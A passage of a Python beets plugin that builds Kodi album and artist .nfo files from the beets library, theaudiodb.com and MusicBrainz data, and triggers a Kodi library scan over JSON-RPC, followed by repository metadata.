"strDescriptionIT":"","strDescriptionJP":"",
"strDescriptionRU":"","strDescriptionES":"",
"strDescriptionPT":"","strDescriptionSE":"",
"strDescriptionNL":"","strDescriptionHU":"",
"strDescriptionNO":"","strDescriptionIL":"",
"strDescriptionPL":"",
"intLoved":"","intScore":"","intScoreVotes":"","strReview":" ",
"strMood":"","strTheme":"","strSpeed":"","strLocation":"",
"strMusicBrainzID":"","strMusicBrainzArtistID":"",
"strItunesID":"","strAmazonID":"","strLocked":""}]}'''
emptyartist = '''{"artists":[{"idArtist":"","strArtist":"",
"strArtistAlternate":"","strLabel":"","idLabel":"",
"intFormedYear":"","intBornYear":"","intDiedYear":"",
"strDisbanded":"","strStyle":"","strGenre":"","strMood":"",
"strWebsite":"","strFacebook":"","strTwitter":"",
"strBiographyEN":"","strBiographyDE":"","strBiographyFR":"",
"strBiographyCN":"","strBiographyIT":"","strBiographyJP":"",
"strBiographyRU":"","strBiographyES":"","strBiographyPT":"",
"strBiographySE":"","strBiographyNL":"","strBiographyHU":"",
"strBiographyNO":"","strBiographyIL":"","strBiographyPL":"",
"strGender":"","intMembers":"","strCountry":"",
"strCountryCode":"","strArtistThumb":"","strArtistLogo":"",
"strArtistFanart":"","strArtistFanart2":"",
"strArtistFanart3":"","strArtistBanner":"",
"strMusicBrainzID":"","strLastFMChart":"","strLocked":""}]}'''
audiodb_url = "http://www.theaudiodb.com/api/v1/json/"
libpath = os.path.expanduser(str(config['library']))
lib = beets.library.Library(libpath)
LINK_ALBUM = 'https://musicbrainz.org/release/{0}'
LINK_ARTIST = 'https://musicbrainz.org/artist/{0}'
LINK_TRACK = 'https://musicbrainz.org/recording/{0}'
def artist_info(albumid):
"""Collect artist information from beets lib and audiodb.com."""
for album in lib.albums(albumid):
data = (album.albumartist, album.albumartist_sort,
album.mb_albumartistid, album.genre, album.path)
url = audiodb_url + "{0}/artist-mb.php?i=".format(
audio_db_key)
try:
response = urllib.request.urlopen(url + data[2])
data2 = simplejson.load(response)["artists"][0]
except (ValueError, TypeError):
# catch simplejson.decoder.JSONDecodeError and load emptydata
data2 = json.loads(emptyartist)["artists"][0]
out_data = (
"{0};{1};{2};{3};{4};{5};{6};{7};{8};{9};{10};{11};{12}".format(
data[0],
data[2],
data[1],
data[3],
data2["strStyle"] or '',
data2["strMood"] or '',
data2["intBornYear"] or '',
data2["intFormedYear"] or '',
data2["strBiographyEN"] or '',
data2["intDiedYear"] or '',
data2["strDisbanded"] or '',
data2["strArtistThumb"] or '',
data2["strArtistFanart"] or ''))
return list(out_data.split(';'))
def artist_albums(artistid):
"""Get artist's albums from beets library."""
albumdata = []
for album in lib.albums(artistid):
row = album.album, album.original_year
albumdata.append(list(tuple([row[1], row[0]]))) # create sortable list
# sort list to start with first release/album
albumlist = (sorted(albumdata))
return albumlist
def album_info(albumid):
"""Collect album information from beets lib and audiodb.com."""
for album in lib.albums(albumid):
data = (
album.albumartist,
album.mb_albumartistid,
album.mb_releasegroupid,
album.album,
album.genre,
album.comp,
album.label,
album.albumtype,
album.mb_albumid)
date = album.original_year, album.original_month, album.original_day
rel_date = (
"%s-%s-%s" %
(date[0], format(
date[1], '02'), format(
date[2], '02')))
url = audiodb_url + "{0}/album-mb.php?i=".format(
config['audiodb']['key'])
if data[5] == 0:
comp = 'False'
else:
comp = 'True'
try:
response = urllib.request.urlopen(url + data[2])
data2 = simplejson.load(response)["album"][0]
except (ValueError, TypeError):
# catch simplejson.decoder.JSONDecodeError and load emptydata
data2 = json.loads(emptyalbum)["album"][0]
out_data = ("{0};{1};{2};{3};{4};{5};{6};{7};{8};{9};{10};{11};{12};"
"{13};{14}".format((data[3]),
(data[8]),
(data[0]),
(data[4]),
(data2["strStyle"]) or '',
(data2["strMood"]) or '',
(data2["strTheme"]) or '',
(comp),
(data2["strReview"]) or '',
(data[7]),
(rel_date),
(data[6]),
(data2["intScore"]) or '',
(date[0]),
(data2["strAlbumThumb"]) or ''))
return list(out_data.split(';'))
def album_tracks(albumid):
"""Get album's tracks from beets libary."""
trackdata = []
for item in lib.items(albumid):
row = item.track, item.mb_trackid, item.length, item.title
duration = time.strftime("%M:%S", time.gmtime(row[2]))
trackdata.append(list(tuple([row[0], duration, row[1], row[3]])))
tracklist = (sorted(trackdata)) # sort list by track number
return tracklist
def kodi_path():
"""From kodi itself get the music library path."""
"""Useful for shared libraries, in order to get nfs or samba paths."""
try:
auth = str.encode(
'%s:%s' %
(config['kodi']['user'],
config['kodi']['pwd']))
authorization = b'Basic ' + base64.b64encode(auth)
headers = {
'Content-Type': 'application/json',
'Authorization': authorization}
url = "http://{0}:{1}/jsonrpc".format(
config['kodi']['host'], config['kodi']['port'])
music_lib_name = "{0}".format(config['kodi']['library_name'])
data = {"jsonrpc": "2.0",
"method": "Files.GetSources",
"params": {"media": music_lib_name},
"id": 1}
json_data = json.dumps(data).encode('utf-8')
request = Request(url, json_data, headers)
result = simplejson.load(urlopen(request))
_kodi_path = result['result']['sources'][0]['file']
return _kodi_path
except (requests.exceptions.RequestException, ValueError, TypeError):
return ''
def album_path(albumid):
"""Get album path."""
out_data = []
for album in lib.albums(albumid):
album_path = album.path.decode("utf-8")
root = str(config["directory"])
length = int(len(root) + 1)
kodi_lib_path = kodi_path() + album_path[length:]
out_data = album_path, kodi_lib_path
return out_data
def artist_path(albumid):
"""Get artist path."""
out_data = []
root = str(config['directory'])
for album in lib.albums(albumid):
albumpath = album.path.decode("utf-8")
albumartist = album.albumartist
if albumartist == os.path.basename(os.path.dirname(albumpath)):
artist_path = os.path.dirname(albumpath)
kodi_lib_path = kodi_path() + artist_path[int(len(root) + 1):]
else:
folder = os.path.join(root, str(config['paths']['default']))
config_items = Path(folder).parts
folder_length = len(config_items)
indices = [i for i,
s in enumerate(config_items) if 'albumartist' in s]
y = int(folder_length - indices[0])
artistpath_items = list(Path(albumpath).parts[-y:-1])
artist_path = os.path.join(root, *artistpath_items)
kodi_lib_path = kodi_path() + artist_path[int(len(root) + 1):]
out_data = artist_path, kodi_lib_path
return out_data
def thumbs(tag, albumid):
"""Name paths where art files reside."""
if "artist" in tag:
thumbs = []
for a in artist_path(albumid):
thumb = os.path.join(a, 'artist.tbn')
thumbs.append(thumb)
return thumbs
if "album" in tag:
for album in lib.albums(albumid):
if album.artpath:
art_file = os.path.basename(album.artpath.decode('utf8'))
thumbs = []
for a in album_path(albumid):
thumb = os.path.join(a, art_file)
thumbs.append(thumb)
return thumbs
def album_nfo_text(albumid, mb_albumid, mb_artistid):
"""Create MBID URL only text file."""
album_nfo_file = os.path.join(album_path(albumid)[0], 'album.nfo')
with open(album_nfo_file, 'w') as f:
f.write(LINK_ALBUM.format(mb_albumid))
if os.path.basename(artist_path(albumid)[0]) in ['Various Artists',
'Soundtracks',
'Compilations']:
pass # No artist.nfo file for compilation albums
else:
artist_nfo_file = os.path.join(artist_path(albumid)[0],
'artsist.nfo')
with open(artist_nfo_file, 'w') as f:
f.write(LINK_ARTIST.format(mb_artistid))
def album_nfo_xml(albumid):
"""Create XML file with album information."""
for album in lib.albums(albumid):
albumnfo = os.path.join(album.path.decode('utf8'), 'album.nfo')
albumid = 'mb_albumid:' + album.mb_albumid
root = et.Element('album')
for i in range(len(album_tags)):
album_tags[i] = et.SubElement(root, '{}'.format(album_tags[i]))
album_tags[i].text = album_info(albumid)[i]
for i in range(len(album_path(albumid))):
path = et.SubElement(root, 'path')
path.text = album_path(albumid)[i]
if album_info(albumid)[14] == '':
for i in range(len(thumbs('album', albumid))):
thumb = et.SubElement(root, 'thumb')
thumb.text = thumbs('album', albumid)[i]
else:
thumb = et.SubElement(root, 'thumb')
thumb.text = album_info(albumid)[14]
for i in range(len(thumbs('album', albumid))):
thumb = et.SubElement(root, 'thumb')
thumb.text = thumbs('album', albumid)[i]
albumartistcredits = et.SubElement(root, 'albumArtistCredits')
artist = et.SubElement(albumartistcredits, 'artist')
artist.text = album.albumartist
musicbrainzartistid = et.SubElement(
albumartistcredits, 'musicBrainzArtistID')
musicbrainzartistid.text = album.mb_albumartistid
for i in range(len(album_tracks(albumid))):
track = et.SubElement(root, 'track')
position = et.SubElement(track, 'position')
position.text = str(album_tracks(albumid)[i][0])
title = et.SubElement(track, 'title')
title.text = album_tracks(albumid)[i][3]
duration = et.SubElement(track, 'duration')
duration.text = album_tracks(albumid)[i][1]
musicbrainztrackid = et.SubElement(track, 'musicBrainzTrackID')
musicbrainztrackid.text = album_tracks(albumid)[i][2]
xml = et.tostring(
root,
pretty_print=True,
xml_declaration=True,
encoding='UTF-8',
standalone="yes").decode()
print(xml, file=open(albumnfo, 'w+'))
def artist_nfo_xml(albumid):
"""Create XML file with artist information."""
for album in lib.albums(albumid):
albumid = 'mb_albumid:' + album.mb_albumid
artistid = 'mb_albumartistid:' + album.mb_albumartistid
artistnfo = os.path.join(
album.path.decode('utf8'),
os.pardir,
'artist.nfo')
if album.albumartist in ['Various Artists', 'Soundtracks',
'Compilations']:
pass
else:
root = et.Element('artist')
for i in range(len(artist_tags)):
artist_tags[i] = et.SubElement(
root, '{}'.format(artist_tags[i]))
artist_tags[i].text = artist_info(albumid)[i]
for i in range(len(artist_path(albumid))):
path = et.SubElement(root, 'path')
path.text = artist_path(albumid)[i]
if artist_info(albumid)[11] == '':
thumb = et.SubElement(root, 'thumb')
thumb.text = ''
else:
thumb_location = os.path.join(
album.path.decode('utf8'),
os.pardir, 'artist.tbn')
urllib.request.urlretrieve(
artist_info(albumid)[11], thumb_location)
thumb = et.SubElement(root, 'thumb')
thumb.text = artist_info(albumid)[11]
for i in range(len(thumbs('artist', albumid))):
thumb = et.SubElement(root, 'thumb')
thumb.text = thumbs('artist', albumid)[i]
fanart = et.SubElement(root, 'fanart')
fanart.text = artist_info(albumid)[12]
for i in range(len(artist_albums(artistid))):
album = et.SubElement(root, 'album')
title = et.SubElement(album, 'title')
title.text = artist_albums(artistid)[i][1]
year = et.SubElement(album, 'year')
year.text = str(artist_albums(artistid)[i][0])
xml = et.tostring(
root,
pretty_print=True,
xml_declaration=True,
encoding='UTF-8',
standalone="yes").decode()
print(xml, file=open(artistnfo, 'w+'))
def update_kodi(host, port, user, password):
"""Send request to the Kodi api to start a library refresh."""
"""By Pauli Kettunen"""
url = "http://{0}:{1}/jsonrpc/".format(host, port)
"""Content-Type: application/json is mandatory"""
"""according to the kodi jsonrpc documentation"""
headers = {'Content-Type': 'application/json'}
# Create the payload. Id seems to be mandatory.
payload = {'jsonrpc': '2.0', 'method': 'AudioLibrary.Scan', 'id': 1}
r = requests.post(
url,
auth=(user, password),
json=payload,
headers=headers)
return r
class KodiNfo(BeetsPlugin):
"""KodiNfo Plugin."""
def __init__(self):
"""Plugin docstring."""
super(KodiNfo, self).__init__()
# Adding defaults.
self.config['audiodb'].add({
"key": 1})
config['kodi'].add({
u'host': u'localhost',
u'port': 8080,
u'user': u'kodi',
u'pwd': u'kodi',
u'nfo_format': 'xml',
u'library_name': 'music'})
config['kodi']['pwd'].redact = True
self.register_listener('album_imported', self.create_nfos)
self.register_listener('database_change', self.listen_for_db_change)
def create_nfos(self, lib, album):
"""Create nfos as per choice in config."""
try:
# Check if MBID is valid UUID as per MB recommendations
UUID(album.mb_albumid)
self._log.info(u'Album ID is valid MBID...creating .nfos')
albumid = 'mb_albumid:' + album.mb_albumid
mb_albumid = album.mb_albumid
mb_artistid = album.mb_albumartistid
nfo_format = '{0}'.format(config['kodi']['nfo_format'])
if nfo_format in 'mbid_only_text':
self._log.info(u'Creating url only text format .nfo file...')
album_nfo_text(albumid, mb_albumid, mb_artistid)
else:
self._log.info(u'creating XML format .nfo file...')
album_nfo_xml(albumid)
artist_nfo_xml(albumid)
except ValueError:
self._log.info(u"Album ID is not valid MBID...can't create .nfos")
def listen_for_db_change(self, lib, model):
"""Listen for beets db change and register the update."""
self.register_listener('cli_exit', self.update)
def update(self, lib):
"""When client exists try sending refresh request to Kodi server."""
self._log.info(u'Updating Kodi library...')
# Try to send update request.
try:
update_kodi(
config['kodi']['host'].get(),
config['kodi']['port'].get(),
config['kodi']['user'].get(),
config['kodi']['pwd'].get())
self._log.info(u'... started.')
except requests.exceptions.RequestException:
self._log.warning(u'Update failed.')
| peace899/beets2kodi | beetsplug/kodinfo.py | kodinfo.py | py | 18,692 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.expanduser",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 66,
"usage_type": "attribute"
},
{
"api_name": "beets.config",
"line_number": 66,
"usage_type": "name"
},
{
"api_name": "beets.library.Library",
... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.